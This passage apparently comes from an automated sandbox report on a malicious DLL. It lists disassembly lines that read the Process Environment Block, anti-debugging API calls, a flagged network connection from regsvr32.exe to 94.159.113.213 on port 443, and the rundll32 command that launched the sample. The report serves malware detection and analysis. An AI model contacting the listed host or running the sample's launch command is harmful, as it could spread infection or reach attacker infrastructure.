                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov ecx, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov ecx, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov eax, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov eax, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov eax, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov eax, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov eax, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA8560 mov eax, dword ptr fs:[00000030h]5_2_7FAA8560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8C4D0 mov edx, dword ptr fs:[00000030h]5_2_7FA8C4D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA94430 mov ecx, dword ptr fs:[00000030h]5_2_7FA94430
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84400 mov edx, dword ptr fs:[00000030h]5_2_7FA84400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84400 mov ecx, dword ptr fs:[00000030h]5_2_7FA84400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84400 mov ecx, dword ptr fs:[00000030h]5_2_7FA84400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84400 mov ecx, dword ptr fs:[00000030h]5_2_7FA84400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84400 mov ecx, dword ptr fs:[00000030h]5_2_7FA84400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84400 mov edx, dword ptr fs:[00000030h]5_2_7FA84400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84464 mov edx, dword ptr fs:[00000030h]5_2_7FA84464
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84464 mov ecx, dword ptr fs:[00000030h]5_2_7FA84464
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAF4358 mov eax, dword ptr fs:[00000030h]5_2_7FAF4358
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov edx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov ecx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov eax, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov eax, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov eax, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov eax, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov eax, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov ecx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov ecx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov eax, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov ecx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov ecx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov ecx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABC270 mov eax, dword ptr fs:[00000030h]5_2_7FABC270
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_6C3E9C40 mov eax, dword ptr fs:[00000030h]9_2_6C3E9C40
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F07AFE0 mov edx, dword ptr fs:[00000030h]9_2_7F07AFE0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F07AFE0 mov eax, dword ptr fs:[00000030h]9_2_7F07AFE0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F052A30 mov edx, dword ptr fs:[00000030h]9_2_7F052A30
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F052A30 mov ecx, dword ptr fs:[00000030h]9_2_7F052A30
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F052A30 mov eax, dword ptr fs:[00000030h]9_2_7F052A30
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F052A30 mov edx, dword ptr fs:[00000030h]9_2_7F052A30
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F065F00 mov ecx, dword ptr fs:[00000030h]9_2_7F065F00
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F076D80 mov edx, dword ptr fs:[00000030h]9_2_7F076D80
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F076D80 mov ecx, dword ptr fs:[00000030h]9_2_7F076D80
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F076D80 mov ecx, dword ptr fs:[00000030h]9_2_7F076D80
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F076D80 mov ecx, dword ptr fs:[00000030h]9_2_7F076D80
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F076D80 mov edx, dword ptr fs:[00000030h]9_2_7F076D80
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F046DF0 mov edx, dword ptr fs:[00000030h]9_2_7F046DF0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F06BC90 mov ecx, dword ptr fs:[00000030h]9_2_7F06BC90
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F051CA0 mov eax, dword ptr fs:[00000030h]9_2_7F051CA0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F067B60 mov ecx, dword ptr fs:[00000030h]9_2_7F067B60
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F067B60 mov eax, dword ptr fs:[00000030h]9_2_7F067B60
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F067B60 mov ecx, dword ptr fs:[00000030h]9_2_7F067B60
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F04CB70 mov edx, dword ptr fs:[00000030h]9_2_7F04CB70
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F04CB70 mov eax, dword ptr fs:[00000030h]9_2_7F04CB70
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F048B90 mov edx, dword ptr fs:[00000030h]9_2_7F048B90
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F048B90 mov ecx, dword ptr fs:[00000030h]9_2_7F048B90
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F048B90 mov ecx, dword ptr fs:[00000030h]9_2_7F048B90
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05A980 mov edx, dword ptr fs:[00000030h]9_2_7F05A980
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05A980 mov ecx, dword ptr fs:[00000030h]9_2_7F05A980
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05A980 mov eax, dword ptr fs:[00000030h]9_2_7F05A980
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05A980 mov eax, dword ptr fs:[00000030h]9_2_7F05A980
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05A980 mov eax, dword ptr fs:[00000030h]9_2_7F05A980
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05A980 mov eax, dword ptr fs:[00000030h]9_2_7F05A980
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05A980 mov eax, dword ptr fs:[00000030h]9_2_7F05A980
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05A980 mov edx, dword ptr fs:[00000030h]9_2_7F05A980
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05A980 mov eax, dword ptr fs:[00000030h]9_2_7F05A980
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F06B9A0 mov eax, dword ptr fs:[00000030h]9_2_7F06B9A0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F06A9E0 mov ecx, dword ptr fs:[00000030h]9_2_7F06A9E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F06A9E0 mov eax, dword ptr fs:[00000030h]9_2_7F06A9E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F06A9E0 mov ecx, dword ptr fs:[00000030h]9_2_7F06A9E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F06A9E0 mov edx, dword ptr fs:[00000030h]9_2_7F06A9E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F06A9E0 mov eax, dword ptr fs:[00000030h]9_2_7F06A9E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F04C820 mov edx, dword ptr fs:[00000030h]9_2_7F04C820
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F068860 mov ecx, dword ptr fs:[00000030h]9_2_7F068860
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F068860 mov eax, dword ptr fs:[00000030h]9_2_7F068860
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F068860 mov edx, dword ptr fs:[00000030h]9_2_7F068860
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F068860 mov eax, dword ptr fs:[00000030h]9_2_7F068860
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F068860 mov ecx, dword ptr fs:[00000030h]9_2_7F068860
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov ecx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov edx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov ecx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov ecx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov ecx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov edx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov eax, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov eax, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov ecx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov ecx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov edx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov edx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov ecx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov ecx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov edx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov edx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov edx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov edx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F071890 mov edx, dword ptr fs:[00000030h]9_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0758E0 mov eax, dword ptr fs:[00000030h]9_2_7F0758E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0758E0 mov edx, dword ptr fs:[00000030h]9_2_7F0758E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0758E0 mov ecx, dword ptr fs:[00000030h]9_2_7F0758E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0758E0 mov eax, dword ptr fs:[00000030h]9_2_7F0758E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0758E0 mov ecx, dword ptr fs:[00000030h]9_2_7F0758E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0758E0 mov edx, dword ptr fs:[00000030h]9_2_7F0758E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0758E0 mov edx, dword ptr fs:[00000030h]9_2_7F0758E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0758E0 mov edx, dword ptr fs:[00000030h]9_2_7F0758E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F04D700 mov eax, dword ptr fs:[00000030h]9_2_7F04D700
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F069770 mov eax, dword ptr fs:[00000030h]9_2_7F069770
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F06B7B0 mov eax, dword ptr fs:[00000030h]9_2_7F06B7B0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F06B7C0 mov edx, dword ptr fs:[00000030h]9_2_7F06B7C0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F094606 mov eax, dword ptr fs:[00000030h]9_2_7F094606
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F057630 mov edx, dword ptr fs:[00000030h]9_2_7F057630
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F057630 mov edx, dword ptr fs:[00000030h]9_2_7F057630
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F057630 mov edx, dword ptr fs:[00000030h]9_2_7F057630
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F057630 mov eax, dword ptr fs:[00000030h]9_2_7F057630
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F057630 mov edx, dword ptr fs:[00000030h]9_2_7F057630
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F057630 mov ecx, dword ptr fs:[00000030h]9_2_7F057630
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F057630 mov ecx, dword ptr fs:[00000030h]9_2_7F057630
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F057630 mov ecx, dword ptr fs:[00000030h]9_2_7F057630
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F057630 mov edx, dword ptr fs:[00000030h]9_2_7F057630
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F09464A mov eax, dword ptr fs:[00000030h]9_2_7F09464A
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F09467B mov eax, dword ptr fs:[00000030h]9_2_7F09467B
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0516A0 mov edx, dword ptr fs:[00000030h]9_2_7F0516A0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0516A0 mov eax, dword ptr fs:[00000030h]9_2_7F0516A0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0606D0 mov eax, dword ptr fs:[00000030h]9_2_7F0606D0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0606D0 mov edx, dword ptr fs:[00000030h]9_2_7F0606D0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0606D0 mov eax, dword ptr fs:[00000030h]9_2_7F0606D0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0606D0 mov eax, dword ptr fs:[00000030h]9_2_7F0606D0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0606D0 mov eax, dword ptr fs:[00000030h]9_2_7F0606D0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0606D0 mov eax, dword ptr fs:[00000030h]9_2_7F0606D0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0606D0 mov eax, dword ptr fs:[00000030h]9_2_7F0606D0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0606D0 mov ecx, dword ptr fs:[00000030h]9_2_7F0606D0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0606D0 mov edx, dword ptr fs:[00000030h]9_2_7F0606D0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0606D0 mov eax, dword ptr fs:[00000030h]9_2_7F0606D0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0646E0 mov ecx, dword ptr fs:[00000030h]9_2_7F0646E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E560 mov ecx, dword ptr fs:[00000030h]9_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E560 mov ecx, dword ptr fs:[00000030h]9_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E560 mov eax, dword ptr fs:[00000030h]9_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E560 mov eax, dword ptr fs:[00000030h]9_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E560 mov eax, dword ptr fs:[00000030h]9_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E560 mov eax, dword ptr fs:[00000030h]9_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E560 mov eax, dword ptr fs:[00000030h]9_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E560 mov ecx, dword ptr fs:[00000030h]9_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E560 mov edx, dword ptr fs:[00000030h]9_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E560 mov ecx, dword ptr fs:[00000030h]9_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E560 mov eax, dword ptr fs:[00000030h]9_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E560 mov ecx, dword ptr fs:[00000030h]9_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F068560 mov eax, dword ptr fs:[00000030h]9_2_7F068560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F044400 mov edx, dword ptr fs:[00000030h]9_2_7F044400
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F044400 mov ecx, dword ptr fs:[00000030h]9_2_7F044400
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F044400 mov ecx, dword ptr fs:[00000030h]9_2_7F044400
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F044400 mov ecx, dword ptr fs:[00000030h]9_2_7F044400
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F044400 mov ecx, dword ptr fs:[00000030h]9_2_7F044400
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F044400 mov edx, dword ptr fs:[00000030h]9_2_7F044400
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F08D438 mov ecx, dword ptr fs:[00000030h]9_2_7F08D438
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F054430 mov ecx, dword ptr fs:[00000030h]9_2_7F054430
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F047450 mov edx, dword ptr fs:[00000030h]9_2_7F047450
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F049480 mov edx, dword ptr fs:[00000030h]9_2_7F049480
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F04C4D0 mov edx, dword ptr fs:[00000030h]9_2_7F04C4D0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F04D3B0 mov edx, dword ptr fs:[00000030h]9_2_7F04D3B0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0683B0 mov edx, dword ptr fs:[00000030h]9_2_7F0683B0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F06E200 mov ecx, dword ptr fs:[00000030h]9_2_7F06E200
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F07C270 mov eax, dword ptr fs:[00000030h]9_2_7F07C270
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov edx, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov ecx, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov eax, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov eax, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov eax, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov eax, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov eax, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov ecx, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov ecx, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov eax, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov ecx, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov ecx, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E0 mov ecx, dword ptr fs:[00000030h]9_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F047000 mov eax, dword ptr fs:[00000030h]9_2_7F047000
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F059020 mov ecx, dword ptr fs:[00000030h]9_2_7F059020
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F059020 mov ecx, dword ptr fs:[00000030h]9_2_7F059020
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F059020 mov eax, dword ptr fs:[00000030h]9_2_7F059020
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F059020 mov eax, dword ptr fs:[00000030h]9_2_7F059020
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F059020 mov eax, dword ptr fs:[00000030h]9_2_7F059020
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F059020 mov eax, dword ptr fs:[00000030h]9_2_7F059020
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F059020 mov eax, dword ptr fs:[00000030h]9_2_7F059020
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F059020 mov eax, dword ptr fs:[00000030h]9_2_7F059020
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F059020 mov eax, dword ptr fs:[00000030h]9_2_7F059020
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F067090 mov eax, dword ptr fs:[00000030h]9_2_7F067090
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF6570A GetProcessHeap,3_2_7EF6570A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC77833 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6CC77833
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF51F06 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_7EF51F06
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4E2C5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_7EF4E2C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4E077 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_7EF4E077
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6CC77833 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6CC77833
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAC1F06 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_7FAC1F06
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABE2C5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_7FABE2C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABE077 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_7FABE077
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_6C3F7833 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_6C3F7833
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F081F06 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_7F081F06
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F07E2C5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_7F07E2C5
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F07E077 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_7F07E077

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 94.159.113.213 443
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4DE2C cpuid 3_2_7EF4DE2C
